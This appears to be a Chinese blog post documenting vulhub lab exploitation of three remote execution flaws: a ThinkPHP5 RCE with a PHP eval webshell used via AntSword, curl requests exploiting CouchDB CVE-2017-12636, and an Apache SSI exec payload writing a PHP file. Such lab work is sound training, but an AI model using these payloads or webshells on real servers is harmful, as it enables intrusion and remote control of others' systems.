vulhub命令执行/代码执行漏洞

一、Thinkphp5 2-rce远程代码执行漏洞

1.打开靶场环境

2、访问网页

3、构造payload

172.16.1.18:8080?s=/Index/index/L/${@phpinfo()}

 4、写入一句话木马,使用蚁剑连接

172.16.1.18:8080/?s=/Index/index/name/${@print(eval($_POST[cmd]))}

 二、Couchdb 任意命令执行漏洞(CVE-2017-12636)

1、启动靶场环境,并在浏览器中访问

2、增加一个管理员用户

3、依次执行如下请求即可触发任意命令执行

curl -X PUT 'http://vulhub:vulhub@172.16.11.11:5984/_config/query_servers/cmd' -d '"id >/tmp/success"'
curl -X PUT 'http://vulhub:vulhub@172.16.1.11:5984/vultest'
curl -X PUT 'http://vulhub:vulhub@172.16.1.11:5984/vultest/vul' -d '{"_id":"770895a97726d5ca6d70a22173005c7b"}'
curl -X POST 'http://vulhub:vulhub@172.16.1.11:5984/vultest/_temp_view?limit=10' -d '{"language":"cmd","map":""}' -H 'Content-Type:application/json'
 

4、进入容器查看 /tmp/ 路径下 是否生成 success 文件

三、Apache SSI 远程命令执行漏洞

1、开启靶场环境并在浏览器中打开

2、写入一句话木马

<!--#exec cmd="echo '<?php phpinfo(); ?>' > /var/www/html/this.php" -->

3、上传文件,点击查看是否写入

 

4、进入容器查看

5、获取phpinfo

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值